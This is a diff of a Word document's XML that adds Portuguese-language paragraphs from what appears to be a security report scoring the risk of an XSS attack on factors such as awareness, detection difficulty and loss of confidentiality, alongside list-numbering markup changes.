+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Awareness (6/10):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> O XSS é um problema conhecido e documentado, mas ainda é comum em muitas aplicações web, principalmente quando o desenvolvimento não segue boas práticas de validação de inputs. Muitos programadores e utilizadores desconhecem a facilidade com que este tipo de ataque pode ser realizado, o que aumenta o risco de sucesso.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Intrusion Detection (3/10):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> É difícil detetar este tipo de ataque, porque o tráfego gerado parece normal ao servidor. A execução do código malicioso acontece no browser da vítima, pelo que os logs do servidor podem não registar nada de suspeito. Sem sistemas de monitorização avançados, o ataque pode passar despercebido durante muito tempo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Fatores de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Impacto Técnico</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>ecnhical impact factors</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Loss of Confidentiality (9/10):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Caso o ataque tenha sucesso, todos os dados da sessão podem ser expostos. O atacante consegue aceder a informações pessoais, dados de conta e recursos protegidos pelo token da sessão, podendo ler conteúdos que deveriam ser privados.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Loss of Integrity (7/10):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> O atacante consegue modificar dados da conta comprometida, como alterar definições, enviar mensagens ou executar ações em nome da vítima. Embora nem sempre cause destruição massiva de dados, estas alterações podem ter consequências graves dependendo da aplicação.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Loss of Availability (3/10):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> O serviço continua a funcionar normalmente, mas a conta da vítima pode ficar bloqueada ou comprometida temporariamente. Isto significa que a disponibilidade do sistema não é o principal problema, mas a vítima pode ter dificuldades em aceder à sua própria conta.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="28"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Loss of Accountability (8/10):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> As ações do atacante aparecem nos logs como se fossem feitas pelo utilizador legítimo. Isto dificulta identificar o verdadeiro responsável e complica a auditoria de eventos ou a investigação de incidentes de segurança, aumentando o risco de uso malicioso não detectado.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId13"/>
-      <w:footerReference w:type="first" r:id="rId14"/>
+      <w:footerReference w:type="default" r:id="rId27"/>
+      <w:footerReference w:type="first" r:id="rId28"/>
       <w:pgSz w:w="12240" w:h="15840"/>
-      <w:pgMar w:top="1760" w:right="2040" w:bottom="2840" w:left="1440" w:header="706" w:footer="706" w:gutter="0"/>
+      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="706" w:footer="706" w:gutter="0"/>
       <w:cols w:space="708"/>
       <w:titlePg/>
       <w:docGrid w:linePitch="326"/>
@@ -3436,6 +7021,108 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="D13D6603"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="FFFFFFFF"/>
+    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="ideographDigital"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="D9C7B505"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="FFFFFFFF"/>
+    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="ideographDigital"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="01082DED"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F40E53E4"/>
@@ -3548,13 +7235,126 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="017F0B4D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="4D6825E8"/>
     <w:numStyleLink w:val="111111"/>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="09937BDE"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="868407DA"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="23104A7A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E25C7B44"/>
@@ -3667,7 +7467,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2A263F6D"/>
     <w:multiLevelType w:val="singleLevel"/>
     <w:tmpl w:val="40090019"/>
@@ -3684,7 +7484,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36662F61"/>
     <w:multiLevelType w:val="singleLevel"/>
     <w:tmpl w:val="40090019"/>
@@ -3702,7 +7502,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36756063"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7682EA8C"/>
@@ -3726,7 +7526,7 @@
       <w:lvlText w:val="%1.%2"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="360" w:hanging="360"/>
+        <w:ind w:left="720" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:hint="default"/>
@@ -3823,7 +7623,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="37087946"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C73849DA"/>
@@ -3936,7 +7736,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="38B71091"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9768F270"/>
@@ -4049,7 +7849,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3C2D472E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="5D1695EC"/>
@@ -4139,7 +7939,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="41D53E22"/>
     <w:multiLevelType w:val="singleLevel"/>
     <w:tmpl w:val="40090019"/>
@@ -4156,7 +7956,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42492CFF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C2781FBC"/>
@@ -4269,7 +8069,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="42836D85"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B6D463F0"/>
@@ -4381,7 +8181,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48274591"/>
     <w:multiLevelType w:val="singleLevel"/>
     <w:tmpl w:val="40090019"/>
@@ -4398,7 +8198,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4F4E3603"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B5609AD2"/>
@@ -4511,7 +8311,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="63130CB7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9E6067B6"/>
@@ -4600,7 +8400,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="65454BBA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3188B5C4"/>
@@ -4712,7 +8512,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="669665FE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1A3A63A4"/>
@@ -4825,7 +8625,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="68374422"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="CD4EC9B6"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4560" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5280" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
